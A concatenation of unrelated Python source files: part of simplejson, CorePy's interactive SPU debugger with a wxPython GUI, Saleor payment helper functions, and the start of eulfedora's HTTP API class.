    # Fold only the explicitly supplied hooks/parsers into kw so the
    # decoder's own defaults apply for the rest.
    overrides = (
        ('object_hook', object_hook),
        ('object_pairs_hook', object_pairs_hook),
        ('parse_float', parse_float),
        ('parse_int', parse_int),
        ('parse_constant', parse_constant),
    )
    for name, value in overrides:
        if value is not None:
            kw[name] = value
    if use_decimal:
        if parse_float is not None:
            raise TypeError("use_decimal=True implies parse_float=Decimal")
        kw['parse_float'] = Decimal
    return cls(encoding=encoding, **kw).decode(s)
def _toggle_speedups(enabled):
    """Switch the simplejson submodules between their C-accelerated and
    pure-Python implementations, then rebuild the cached default codecs.

    Primarily used by the test suite. The module-level ``_default_encoder``
    and ``_default_decoder`` are recreated so that they pick up the newly
    selected scanner/encoder implementations.
    """
    import simplejson.decoder as dec
    import simplejson.encoder as enc
    import simplejson.scanner as scan
    c_make_encoder = _import_c_make_encoder()
    if enabled:
        # Prefer the C implementations; each falls back to the pure-Python
        # variant when the _speedups extension is unavailable.
        dec.scanstring = dec.c_scanstring or dec.py_scanstring
        enc.c_make_encoder = c_make_encoder
        enc.encode_basestring_ascii = (enc.c_encode_basestring_ascii or
            enc.py_encode_basestring_ascii)
        scan.make_scanner = scan.c_make_scanner or scan.py_make_scanner
    else:
        dec.scanstring = dec.py_scanstring
        enc.c_make_encoder = None
        enc.encode_basestring_ascii = enc.py_encode_basestring_ascii
        scan.make_scanner = scan.py_make_scanner
    # The decoder module holds its own reference to the scanner factory;
    # keep it in sync with the scanner module.
    dec.make_scanner = scan.make_scanner
    # Rebuild the cached default codecs so they use the new internals.
    global _default_decoder
    _default_decoder = JSONDecoder(
        encoding=None,
        object_hook=None,
        object_pairs_hook=None,
    )
    global _default_encoder
    # NOTE(review): unlike the module-level initialization, this rebuild
    # does not pass use_decimal=False explicitly — presumably relies on the
    # JSONEncoder default; verify they agree.
    _default_encoder = JSONEncoder(
        skipkeys=False,
        ensure_ascii=True,
        check_circular=True,
        allow_nan=True,
        indent=None,
        separators=None,
        encoding='utf-8',
        default=None,
    )
| |
# Copyright (c) 2006-2009 The Trustees of Indiana University.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# - Neither the Indiana University nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Playing around with debugging and interactive SPE development...
__doc__ = """
ispu is an interactive SPU program that lets the user execute commands
one at a time on the SPU and view the results in Python.
ispu has command line and GUI modes.  The GUI uses wxPython.  To run
the GUI, make sure wxPython is installed and simply run ispu.py from
the command line:
% pythonw ispu.py
The command line mode lets the user run ispu in the Python
interpreter.  The following is a simple SPU session:
% python
...
>>> import corepy.arch.spu.isa as spu
>>> import ispu
>>> cli = ispu.ISPU()
>>> cli.start()
>>> cli.execute(spu.iohl(127, 0xB8CA))
>>> cli.execute(spu.iohl(126, 0x1234))
>>> cli.execute(spu.a(125, 126, 127))
>>> regs = cli.get_regs()
>>> print '%X' % regs[125][0]
>>> cli.stop()
When running, ispu reserves an SPU. When used interactively, make
sure to call the stop() method to free the SPU when done.
"""
import corepy.arch.spu.platform as env
import corepy.arch.spu.isa as spu
import corepy.arch.spu.lib.util as util
import corepy.lib.extarray as extarray
# Feature TODO:
# Allow for an instruction stream to be passed in
# Breakpoints?
# Watch variables?
# Local store inspection
# Memory inspection
# Changing of register/local store/memory contents via GUI
# Insert the instructions to do this into the stream?
# Or just do it all behind the scenes?
# Stick with always executing one instruction at a time, or allow for executing
# more than once before stopping?
# Always doing one at a time is simpler, but slower
# What should the GUI look like?
# Separate windows for the instruction list, registers, local store, mem, etc
class ISPU:
    """
    Simple Command line interface to the SPUs.

    Synthesizes a small command loop on an SPU: each execute() call patches
    one instruction into the loop, runs it, and the SPU dumps its register
    file into local store where the host can read it back.
    """

    def __init__(self):
        # Code and memory buffers
        self.code = env.InstructionStream()
        # Host-side mirror of the SPU register file: 128 registers of
        # 4 x 32-bit words each.
        self.regs = extarray.extarray('I', 128 * 4)
        self.regs.clear()

        # Runtime parameters
        self.speid = None
        self.reg_lsa = None
        self.proc = None

        self.synthesize()
        return

    def synthesize(self):
        """Build the SPU command loop: one patchable instruction slot,
        128 register-store placeholders, and a stop."""
        # Okay. This code is not going to exceed 256 instructions (1kb).
        # Knowing that, the register contents can be safely placed at
        # 0x3F400 in localstore, 3kb from the top. The SPRE will place the
        # instruction stream as close to the top as possible. But since it
        # is not going to be more than 1kb worth of instructions, it will
        # not overlap with the register contents.
        code = self.code
        spu.set_active_code(code)

        # Reload the instructions
        spu.sync(1)

        # Next instruction to execute (patched by execute())
        lbl_op = code.size()
        spu.nop(0)

        # Placeholders for register store instructions
        for i in range(128):
            spu.stqa(i, 0xFD00 + (i * 4))
            # spu.stqa(i, 0xFE00 + (i * 4))

        # Stop for next command
        spu.stop(0x0FFF)
        # NOTE(review): lbl_regs is computed but never used afterwards.
        lbl_regs = code.size()
        # Create space for the saved registers
        #for i in range(128):
        #  # 16 bytes/register
        #  spu.nop(0)
        #  spu.lnop()
        #  spu.nop(0)
        #  spu.lnop()

        # Clearing active code here is important!
        spu.set_active_code(None)
        code.cache_code()

        code_size = len(code._prologue._code) * 4
        # Round the DMA transfer size up to a 16-byte (quadword) boundary.
        self.xfer_size = code_size + (16 - (code_size) % 16);
        print 'xfer_size:', self.xfer_size
        # Place the code near the top of local store, 128-byte aligned.
        self.code_lsa = (0x3FFFF - code_size) & 0xFFF80;
        self.lbl_op = lbl_op
        return

    def load_regs(self):
        """DMA the saved register area (0x3F400 in local store) back into
        the host-side self.regs buffer."""
        # NOTE(review): uses self.speid, which __init__ sets to None and
        # start() never assigns — confirm this path is still exercised.
        env.spu_exec.spu_putb(self.speid, 0x3F400, self.regs.buffer_info()[0],
                              128 * 16, 2, 0, 0)
        env.spu_exec.read_tag_status(self.speid, 1 << 2)
        return

    def get_regs(self):
        """Return the register file as a list of 128 (w0, w1, w2, w3) tuples."""
        self.load_regs()

        regs = []
        for reg in range(128):
            regs.append((self.regs[reg * 4],
                         self.regs[reg * 4 + 1],
                         self.regs[reg * 4 + 2],
                         self.regs[reg * 4 + 3]))
        return regs

    def print_regs(self):
        """Print all 128 registers, two per line (rN and rN+64)."""
        self.load_regs()

        for i in range(64):
            reg = i
            # Trailing comma keeps both halves of the row on one line.
            print 'r%03d: 0x%08X 0x%08X 0x%08X 0x%08X' % (
                reg, self.regs[reg * 4],
                self.regs[reg * 4 + 1],
                self.regs[reg * 4 + 2],
                self.regs[reg * 4 + 3]),

            reg = i + 64
            print 'r%03d: 0x%08X 0x%08X 0x%08X 0x%08X' % (
                reg, self.regs[reg * 4],
                self.regs[reg * 4 + 1],
                self.regs[reg * 4 + 2],
                self.regs[reg * 4 + 3])
        return

    def start(self):
        """Reserve an SPU context and upload/run the synthesized loop."""
        self.started = True

        #self.proc = env.Processor()
        #self.speid = self.proc.execute(self.code, async = True, debug = False)
        #env.spu_exec.wait(self.speid)

        # Code size in bytes, rounded up to a 16-byte boundary for DMA.
        self.code_len = len(self.code._code_array) * self.code._code_array.itemsize
        if self.code_len % 16 != 0:
            self.code_len += 16 - (self.code_len % 16)
        # Load the code at the very top of the 256kb local store.
        self.code_lsa = 0x40000 - self.code_len

        self.ctx = env.spu_exec.alloc_context()
        self.code.cache_code()
        env.spu_exec.run_stream(self.ctx, self.code.start_addr(), self.code_len, self.code_lsa, self.code_lsa)
        return

    def stop(self):
        """Free the SPU context; must be called when done to release the SPU."""
        env.spu_exec.free_context(self.ctx)
        self.ctx = None
        self.started = False
        return

    def execute(self, cmd):
        """Patch *cmd* into the command slot and run one pass of the loop."""
        if self.started != True:
            print "ERROR ISPU not started; do ISPU.start() first"
            return

        # Overwrite the placeholder nop at lbl_op with the new instruction.
        self.code[self.lbl_op] = cmd
        self.code.cache_code()
        env.spu_exec.run_stream(self.ctx, self.code.start_addr(), self.code_len, self.code_lsa, self.code_lsa)
        return
try:
import wx
except:
print 'Warning: wx not found. GUI is not available'
wx = None
class RegisterWindow(wx.Panel):
    """wx panel showing a (register, value) list for all 128 SPU registers.

    NOTE(review): this class is defined unconditionally even though the
    ``import wx`` above may have failed (wx is then None) — importing this
    module without wxPython will raise despite the printed warning.
    """

    def __init__(self, parent, id = -1):
        wx.Panel.__init__(self, parent, id)
        self._buildGUI()
        return

    def _buildGUI(self):
        # Two-column report list: register number and its four hex words.
        listRegs = wx.ListCtrl(self, -1, style=wx.LC_REPORT | wx.SUNKEN_BORDER)
        listRegs.InsertColumn(0, 'Register')
        listRegs.InsertColumn(1, 'Value')

        # Fixed-width font so the hex columns line up.
        fixedFont = wx.Font(11, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)

        # Fill all 128 rows with placeholder values until the first update.
        for i in range(128):
            idx = listRegs.InsertStringItem(i, '%d' % (i))
            listRegs.SetStringItem(idx, 1, '0x???????? 0x???????? 0x???????? 0x????????')
            listRegs.SetItemData(idx, i)
            listRegs.SetItemFont(idx, fixedFont)

        listRegs.SetColumnWidth(0, wx.LIST_AUTOSIZE_USEHEADER)
        listRegs.SetColumnWidth(1, 350) # wx.LIST_AUTOSIZE)

        sizer = wx.BoxSizer(wx.VERTICAL)
        sizer.Add(listRegs, 1, wx.EXPAND)
        sizer.Layout()

        self.SetSizer(sizer)
        self.listRegs = listRegs
        return

    def HighlightReg(self, reg, highlight):
        """Set or clear the red 'changed' highlight on a register row."""
        if not highlight:
            self.listRegs.SetItemBackgroundColour(reg, wx.WHITE)
        else:
            self.listRegs.SetItemBackgroundColour(reg, wx.RED)
            # Scroll newly highlighted registers into view.
            self.listRegs.EnsureVisible(reg)
        return

    def SetRegValue(self, reg, value):
        """Display *value* (a 4-tuple of 32-bit words) for register *reg*."""
        self.listRegs.SetStringItem(reg, 1, '0x%08X 0x%08X 0x%08X 0x%08X' % value)
        return
class SPUApp(wx.App):
    """wxPython front end for ISPU: a command box, a register view that
    highlights changes, and a command-history list."""

    def OnInit(self):
        print """
*** Thank you for using the wxPython Interactive SPU ***

To use, simply type any SPU ISA command into the command box using
the CorePy ISA syntax and with integer values for registers. For
example, to create and add two vectors, enter the following
commands one at time followed by a return:

  ai(11, 0, 127)
  ai(31, 0, 126)
  a(127, 126, 125)

ISPU will highlight registers as they change.

Previous instructions can be accessed from the history list using
the up/down arrow keys.

Type 'quit' or close the window to exit.

*** Email chemuell@cs.indiana.edu with any questions/comments ***
"""
        # Register-diff tracking between successive commands.
        self.lastDiffs = []
        self.regDiffs = []
        # Command history; currentCmd == -1 means "no history entry selected".
        self.history = []
        self.currentCmd = -1

        self._buildGUI()
        self._startSPU()
        return True

    def _buildGUI(self):
        # Main frame: register list + command box on the left, history on
        # the right.
        frame = wx.Frame(None, -1, 'Interactive SPU')

        stcCmd = wx.StaticText(frame, -1, 'Command:')
        txtCmd = wx.TextCtrl(frame, -1, style = wx.TE_PROCESS_ENTER)

        txtSizer = wx.BoxSizer(wx.HORIZONTAL)
        txtSizer.Add((5,-1))
        txtSizer.Add(stcCmd, flag = wx.ALIGN_CENTER)
        txtSizer.Add(txtCmd, 1)
        txtSizer.Add((5,-1))
        txtSizer.Layout()

        listRegs = RegisterWindow(frame)

        cmdSizer = wx.BoxSizer(wx.VERTICAL)
        cmdSizer.Add(listRegs, 1, wx.EXPAND)
        cmdSizer.Add((-1,2))
        cmdSizer.Add(txtSizer, 0, wx.EXPAND)
        cmdSizer.Add((-1,2))
        cmdSizer.Layout()

        lstHistory = wx.ListCtrl(frame, -1, size = (150, -1),
                                 style = (wx.LC_REPORT | wx.LC_NO_HEADER | wx.LC_SINGLE_SEL |
                                          wx.SUNKEN_BORDER))
        lstHistory.InsertColumn(0, 'Command History', -1)
        lstHistory.SetColumnWidth(0, 120)

        mainSizer = wx.BoxSizer(wx.HORIZONTAL)
        mainSizer.Add(cmdSizer, 1, wx.EXPAND)
        mainSizer.Add(lstHistory, 0, wx.EXPAND)
        mainSizer.Layout()

        frame.SetSizer(mainSizer)
        frame.Show(True)

        # Enter executes; arrow keys navigate history (see OnChar).
        self.Bind(wx.EVT_TEXT_ENTER, self.OnExecute, id=txtCmd.GetId())
        self.Bind(wx.EVT_CHAR, self.OnChar, id=txtCmd.GetId())

        self.txtCmd = txtCmd
        self.lstHistory = lstHistory
        self.listRegs = listRegs
        self.frame = frame
        return

    def _startSPU(self):
        # Reserve an SPU and seed the register view with zeros.
        cli = ISPU()
        cli.start()

        # self.lastRegs = cli.get_regs()
        self.lastRegs = [(0,0,0,0) for i in range(128)]
        self._updateRegView(True)
        self.cli = cli
        return

    def _updateRegs(self):
        # Record which registers changed since the previous command.
        regs = self.cli.get_regs()

        self.lastDiffs = self.regDiffs
        diffs = []
        for i in range(128):
            if regs[i] != self.lastRegs[i]:
                diffs.append(i)

        self.regDiffs = diffs
        self.lastRegs = regs
        return

    def _updateRegView(self, all = False):
        # NOTE(review): parameter name shadows the builtin ``all``.
        if all:
            # Full refresh: repaint every register and clear highlights.
            for reg in range(128):
                self.listRegs.SetRegValue(reg, self.lastRegs[reg])
                self.listRegs.HighlightReg(reg, False)

        # Un-highlight the previous command's diffs, then highlight the
        # current ones with their new values.
        for diff in self.lastDiffs:
            self.listRegs.HighlightReg(diff, False)

        for diff in self.regDiffs:
            self.listRegs.SetRegValue(diff, self.lastRegs[diff])
            self.listRegs.HighlightReg(diff, True)
        return

    def _executeSPU(self, cmd):
        # Evaluate the user's text as a CorePy spu.* instruction, run it,
        # and refresh the register view.
        # NOTE(review): eval() of raw user input — acceptable for a local
        # interactive tool, but never expose this to untrusted input.
        try:
            inst = eval('spu.%s' % cmd)
        except:
            print 'Error creating command: %s' % cmd
        else:
            self.cli.execute(inst)
            self._updateRegs()
            self._updateRegView()
        return

    def _setCurrent(self, idx):
        """Move the history selection highlight to *idx* (-1 = none)."""
        if self.currentCmd != -1:
            # Clear the previous selection's colours.
            self.lstHistory.SetItemBackgroundColour(self.currentCmd, wx.WHITE)
            self.lstHistory.SetItemTextColour(self.currentCmd, wx.BLACK)

        self.currentCmd = idx
        if idx == -1:
            # NOTE(review): this paints item -1 — presumably a harmless
            # no-op in wx, but verify.
            self.lstHistory.SetItemBackgroundColour(self.currentCmd, wx.WHITE)
            self.lstHistory.SetItemTextColour(self.currentCmd, wx.BLACK)
        else:
            self.lstHistory.SetItemBackgroundColour(self.currentCmd, wx.BLUE)
            self.lstHistory.SetItemTextColour(self.currentCmd, wx.WHITE)
            self.lstHistory.EnsureVisible(self.currentCmd)
        return

    def OnChar(self, event):
        # Up/down arrows walk the command history.
        key = event.GetKeyCode()

        if len(self.history) == 0:
            pass
        elif key == wx.WXK_UP:
            # print 'up'
            # NOTE(review): repeated presses can drive idx below 0, wrapping
            # to history[-1] via negative indexing — confirm intended.
            idx = self.currentCmd
            if idx == -1: idx = len(self.history) - 1
            else: idx -= 1
            self._setCurrent(idx)
            self.txtCmd.SetValue(self.history[self.currentCmd])
        elif key == wx.WXK_DOWN and (self.currentCmd + 1) < len(self.history):
            # print 'down'
            idx = self.currentCmd
            if idx == -1: idx = len(self.history) - 1
            else: idx += 1
            self._setCurrent(idx)
            self.txtCmd.SetValue(self.history[self.currentCmd])

        event.Skip()
        return

    def OnExecute(self, event):
        # Run the typed command ('quit' closes the window) and append it to
        # the history list.
        cmd = self.txtCmd.GetValue()
        if cmd == 'quit':
            self.frame.Close()
        else:
            self._executeSPU(cmd)
            self.txtCmd.Clear()

            cmdIdx = len(self.history)
            self.history.append(cmd)
            self.lstHistory.InsertStringItem(cmdIdx, cmd)
            self.lstHistory.EnsureVisible(cmdIdx)
            self._setCurrent(-1)
        return
if __name__=='__main__':
    # Launch the wxPython GUI. The commented lines show the equivalent
    # command-line session.
    # cli = ISPU()
    # cli.start()
    # cli.execute(spu.ai(11, 0, 127))
    # cli.execute(spu.ai(31, 0, 126))
    # cli.execute(spu.a(127, 126, 125))
    # cli.print_regs()
    # cli.stop()
    app = SPUApp(0)
    app.MainLoop()
| |
import json
import logging
from decimal import Decimal
from typing import Dict
from django.conf import settings
from django.core.serializers.json import DjangoJSONEncoder
from django.db import transaction
from ..account.models import Address
from ..checkout.models import Checkout
from ..order.actions import handle_fully_paid_order
from ..order.models import Order
from . import ChargeStatus, GatewayError, PaymentError, TransactionKind
from .interface import AddressData, GatewayResponse, PaymentData
from .models import Payment, Transaction
logger = logging.getLogger(__name__)

# Fallback error message when a gateway reports failure without details.
GENERIC_TRANSACTION_ERROR = "Transaction was unsuccessful"
# Transaction kinds accepted from gateways: the stored value of each
# (value, label) pair in TransactionKind.CHOICES.
ALLOWED_GATEWAY_KINDS = {choices[0] for choices in TransactionKind.CHOICES}
# Private-meta namespace under which per-gateway customer ids are stored.
GATEWAYS_META_NAMESPACE = "payment-gateways"
def create_payment_information(
    payment: Payment,
    payment_token: str = None,
    amount: Decimal = None,
    billing_address: AddressData = None,
    shipping_address: AddressData = None,
    customer_id: str = None,
    store_source: bool = False,
) -> PaymentData:
    """Extract order information along with payment details.

    Returns information required to process payment and additional
    billing/shipping addresses for optional fraud-prevention mechanisms.
    """
    order = payment.order

    # Fall back to the order's addresses when none were supplied explicitly.
    billing = None
    shipping = None
    if billing_address is None and order and order.billing_address:
        billing = AddressData(**order.billing_address.as_data())
    if shipping_address is None and order and order.shipping_address:
        shipping = AddressData(**order.shipping_address.as_data())

    return PaymentData(
        token=payment_token,
        amount=amount or payment.total,
        currency=payment.currency,
        billing=billing or billing_address,
        shipping=shipping or shipping_address,
        order_id=order.pk if order else None,
        customer_ip_address=payment.customer_ip_address,
        customer_id=customer_id,
        customer_email=payment.billing_email,
        reuse_source=store_source,
    )
def create_payment(
    gateway: str,
    total: Decimal,
    currency: str,
    email: str,
    billing_address: Address,
    customer_ip_address: str = "",
    payment_token: str = "",
    extra_data: Dict = None,
    checkout: Checkout = None,
    order: Order = None,
) -> Payment:
    """Create a payment instance.

    This method is responsible for creating payment instances that works for
    both Django views and GraphQL mutations.
    """
    # Values applied only when a new Payment row is created.
    defaults = {
        "billing_email": email,
        "billing_first_name": billing_address.first_name,
        "billing_last_name": billing_address.last_name,
        "billing_company_name": billing_address.company_name,
        "billing_address_1": billing_address.street_address_1,
        "billing_address_2": billing_address.street_address_2,
        "billing_city": billing_address.city,
        "billing_postal_code": billing_address.postal_code,
        "billing_country_code": billing_address.country.code,
        "billing_country_area": billing_address.country_area,
        "currency": currency,
        "gateway": gateway,
        "total": total,
    }

    # Values used to look up an existing payment (and set on creation).
    lookup = {
        "is_active": True,
        "customer_ip_address": customer_ip_address,
        "extra_data": extra_data if extra_data is not None else {},
        "token": payment_token,
    }
    if order is not None:
        lookup["order"] = order
    if checkout is not None:
        lookup["checkout"] = checkout

    payment, _created = Payment.objects.get_or_create(defaults=defaults, **lookup)
    return payment
def create_transaction(
    payment: Payment,
    kind: str,
    payment_information: PaymentData,
    gateway_response: GatewayResponse = None,
    error_msg=None,
) -> Transaction:
    """Create a transaction based on transaction kind and gateway response."""
    if not gateway_response:
        # No (usable) response from the gateway — the request was invalid or
        # an exception occurred. Synthesize a failed response whose token,
        # amount and currency come from the request data instead.
        gateway_response = GatewayResponse(
            kind=kind,
            action_required=False,
            transaction_id=payment_information.token,
            is_success=False,
            amount=payment_information.amount,
            currency=payment_information.currency,
            error=error_msg,
            raw_response={},
        )

    return Transaction.objects.create(
        payment=payment,
        kind=gateway_response.kind,
        token=gateway_response.transaction_id,
        is_success=gateway_response.is_success,
        amount=gateway_response.amount,
        currency=gateway_response.currency,
        error=gateway_response.error,
        customer_id=gateway_response.customer_id,
        gateway_response=gateway_response.raw_response or {},
    )
def clean_capture(payment: Payment, amount: Decimal):
    """Check if payment can be captured.

    Raises PaymentError when the amount is non-positive, the payment is not
    capturable, or the amount exceeds what remains un-captured.
    """
    if amount <= 0:
        raise PaymentError("Amount should be a positive number.")
    if not payment.can_capture():
        raise PaymentError("This payment cannot be captured.")
    uncaptured = payment.total - payment.captured_amount
    if amount > payment.total or amount > uncaptured:
        raise PaymentError("Unable to charge more than un-captured amount.")
def clean_authorize(payment: Payment):
    """Check if payment can be authorized."""
    if payment.can_authorize():
        return
    raise PaymentError("Charged transactions cannot be authorized again.")
def validate_gateway_response(response: GatewayResponse):
    """Validate response to be a correct format for Saleor to process.

    Raises GatewayError for a wrong type, an unknown transaction kind, or a
    raw_response that cannot be JSON-serialized; logs a warning when the
    currency differs from the store default.
    """
    if not isinstance(response, GatewayResponse):
        raise GatewayError("Gateway needs to return a GatewayResponse obj")

    if response.kind not in ALLOWED_GATEWAY_KINDS:
        allowed = sorted(ALLOWED_GATEWAY_KINDS)
        raise GatewayError(
            "Gateway response kind must be one of {}".format(allowed)
        )

    if response.currency != settings.DEFAULT_CURRENCY:
        logger.warning("Transaction currency is different than Saleor's.")

    try:
        json.dumps(response.raw_response, cls=DjangoJSONEncoder)
    except (TypeError, ValueError):
        raise GatewayError("Gateway response needs to be json serializable")
@transaction.atomic
def gateway_postprocess(transaction, payment):
    """Apply the effects of a successful gateway transaction to *payment*.

    NOTE(review): the ``transaction`` parameter shadows the imported
    ``django.db.transaction`` module inside this function body.
    """
    # Failed transactions leave the payment untouched.
    if not transaction.is_success:
        return

    transaction_kind = transaction.kind

    if transaction_kind in {TransactionKind.CAPTURE, TransactionKind.CONFIRM}:
        payment.captured_amount += transaction.amount

        # Set payment charge status to fully charged
        # only if there is no more amount needs to charge
        payment.charge_status = ChargeStatus.PARTIALLY_CHARGED
        if payment.get_charge_amount() <= 0:
            payment.charge_status = ChargeStatus.FULLY_CHARGED

        payment.save(update_fields=["charge_status", "captured_amount"])
        order = payment.order
        if order and order.is_fully_paid():
            handle_fully_paid_order(order)

    elif transaction_kind == TransactionKind.VOID:
        # Voiding deactivates the payment without changing amounts.
        payment.is_active = False
        payment.save(update_fields=["is_active"])

    elif transaction_kind == TransactionKind.REFUND:
        changed_fields = ["captured_amount"]
        payment.captured_amount -= transaction.amount
        payment.charge_status = ChargeStatus.PARTIALLY_REFUNDED
        if payment.captured_amount <= 0:
            # Fully refunded payments are also deactivated.
            payment.charge_status = ChargeStatus.FULLY_REFUNDED
            payment.is_active = False
        # Persist status/activity alongside the amount.
        changed_fields += ["charge_status", "is_active"]
        payment.save(update_fields=changed_fields)
def fetch_customer_id(user, gateway):
    """Retrieve users customer_id stored for desired gateway."""
    key = prepare_namespace_name(gateway)
    # Users without private-meta support simply have no stored customer id.
    meta_getter = getattr(user, "get_private_meta", None)
    if meta_getter is None:
        return None
    gateway_config = meta_getter(namespace=GATEWAYS_META_NAMESPACE, client=key)
    return gateway_config.get("customer_id", None)
def store_customer_id(user, gateway, customer_id):
    """Store customer_id in users private meta for desired gateway."""
    client_key = prepare_namespace_name(gateway)
    user.store_private_meta(
        namespace=GATEWAYS_META_NAMESPACE,
        client=client_key,
        item={"customer_id": customer_id},
    )
    user.save(update_fields=["private_meta"])
def prepare_namespace_name(s):
    """Normalize a gateway name into a private-meta client key
    (surrounding whitespace removed, upper-cased)."""
    trimmed = s.strip()
    return trimmed.upper()
def update_card_details(payment, gateway_response):
    """Copy card details from a gateway response onto the payment and save."""
    card = gateway_response.card_info
    payment.cc_brand = card.brand or ""
    payment.cc_last_digits = card.last_4
    payment.cc_exp_year = card.exp_year
    payment.cc_exp_month = card.exp_month
    payment.save(
        update_fields=["cc_brand", "cc_last_digits", "cc_exp_year", "cc_exp_month"]
    )
def get_payment_token(payment: Payment):
    """Return the token of the payment's successful AUTH transaction.

    :raises PaymentError: when no successful authorization transaction exists.
    """
    successful_auth = (
        payment.transactions
        .filter(kind=TransactionKind.AUTH, is_success=True)
        .first()
    )
    if successful_auth is None:
        raise PaymentError("Cannot process unauthorized transaction")
    return successful_auth.token
| |
# file eulfedora/api.py
#
# Copyright 2010,2011 Emory University Libraries
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import csv
import logging
import requests
import time
import warnings
from requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor, \
user_agent
import six
from six.moves.urllib.parse import urljoin
try:
from django.dispatch import Signal
except ImportError:
Signal = None
from eulfedora import __version__ as eulfedora_version
from eulfedora.util import datetime_to_fedoratime, \
RequestFailed, ChecksumMismatch, PermissionDenied, parse_rdf, \
ReadableIterator, force_bytes
logger = logging.getLogger(__name__)
# low-level wrappers
# bind a signal for tracking api calls; used by debug panel
if Signal is not None:
    # senders supply: time_taken, method, url, response, args, kwargs
    # NOTE: ``providing_args`` was documentation-only; it was deprecated in
    # Django 3.1 and removed in Django 4.0, so it must not be passed here.
    api_called = Signal()
else:
    # django is not installed; api-call tracking is disabled
    api_called = None
class HTTP_API_Base(object):
    """Base class for HTTP access to Fedora.

    Holds connection information (base url, optional basic-auth credentials)
    and a :class:`requests.Session`, and exposes thin get/head/put/post/delete
    wrappers that make urls absolute, apply auth options, and convert HTTP
    error responses into eulfedora exceptions.
    """
    def __init__(self, base_url, username=None, password=None, retries=None):
        """
        :param base_url: base url for the Fedora repository; a trailing
            slash is added if not present
        :param username: optional username for HTTP basic authentication
        :param password: optional password for HTTP basic authentication
        :param retries: optional number of retries for the HTTP adapter;
            when ``None``, requests' default behavior (no retries) is kept
        """
        # standardize url format; ensure we have a trailing slash,
        # adding one if necessary
        if not base_url.endswith('/'):
            base_url = base_url + '/'
        # create a new session and add to global sessions
        self.session = requests.Session()
        # Set headers to be passed with every request
        # NOTE: only headers that will be common for *all* requests
        # to this fedora should be set in the session
        # (i.e., do NOT include auth information here)
        # NOTE: ssl verification is turned on by default
        self.session.headers = {
            # use requests-toolbelt user agent
            'User-Agent': user_agent('eulfedora', eulfedora_version),
        }
        # no retries is requests current default behavior, so only
        # customize if a value is set
        if retries is not None:
            adapter = requests.adapters.HTTPAdapter(max_retries=retries)
            self.session.mount('http://', adapter)
            self.session.mount('https://', adapter)
        self.base_url = base_url
        self.username = username
        self.password = password
        # per-request keyword options applied in _make_request
        self.request_options = {}
        if self.username is not None:
            # store basic auth option to pass when making requests
            self.request_options['auth'] = (self.username, self.password)
    def absurl(self, rel_url):
        """Resolve *rel_url* relative to the configured base url."""
        return urljoin(self.base_url, rel_url)
    def prep_url(self, url):
        # hook point for subclasses to customize url preparation
        return self.absurl(url)
    # thinnest possible wrappers around requests calls
    # - add auth, make urls absolute
    def _make_request(self, reqmeth, url, *args, **kwargs):
        """Issue an HTTP request via *reqmeth* and map error responses.

        Sends the ``api_called`` signal (when django is available), logs
        timing, and raises on any 4xx/5xx response.

        :raises PermissionDenied: on 401/403 responses
        :raises ChecksumMismatch: on a 500 whose body reports a checksum
            mismatch
        :raises RequestFailed: on any other 4xx/5xx response
        """
        # copy base request options and update with any keyword args
        rqst_options = self.request_options.copy()
        rqst_options.update(kwargs)
        start = time.time()
        response = reqmeth(self.prep_url(url), *args, **rqst_options)
        total_time = time.time() - start
        logger.debug('%s %s=>%d: %f sec', reqmeth.__name__.upper(), url,
                     response.status_code, total_time)
        # if django signals are available, send api called
        if api_called is not None:
            api_called.send(sender=self.__class__, time_taken=total_time,
                            method=reqmeth, url=url, response=response,
                            args=args, kwargs=kwargs)
        # NOTE: currently doesn't do anything with 3xx responses
        # (likely handled for us by requests)
        if response.status_code >= requests.codes.bad:  # 400 or worse
            # separate out 401 and 403 (permission errors) to enable
            # special handling in client code.
            if response.status_code in (requests.codes.unauthorized,
                                        requests.codes.forbidden):
                raise PermissionDenied(response)
            elif response.status_code == requests.codes.server_error:
                # check response content to determine if this is a
                # ChecksumMismatch or a more generic error
                if 'Checksum Mismatch' in response.text:
                    raise ChecksumMismatch(response)
                else:
                    raise RequestFailed(response)
            else:
                raise RequestFailed(response)
        return response
    def get(self, *args, **kwargs):
        """HTTP GET via :meth:`_make_request`."""
        return self._make_request(self.session.get, *args, **kwargs)
    def head(self, *args, **kwargs):
        """HTTP HEAD via :meth:`_make_request`."""
        return self._make_request(self.session.head, *args, **kwargs)
    def put(self, *args, **kwargs):
        """HTTP PUT via :meth:`_make_request`."""
        return self._make_request(self.session.put, *args, **kwargs)
    def post(self, *args, **kwargs):
        """HTTP POST via :meth:`_make_request`."""
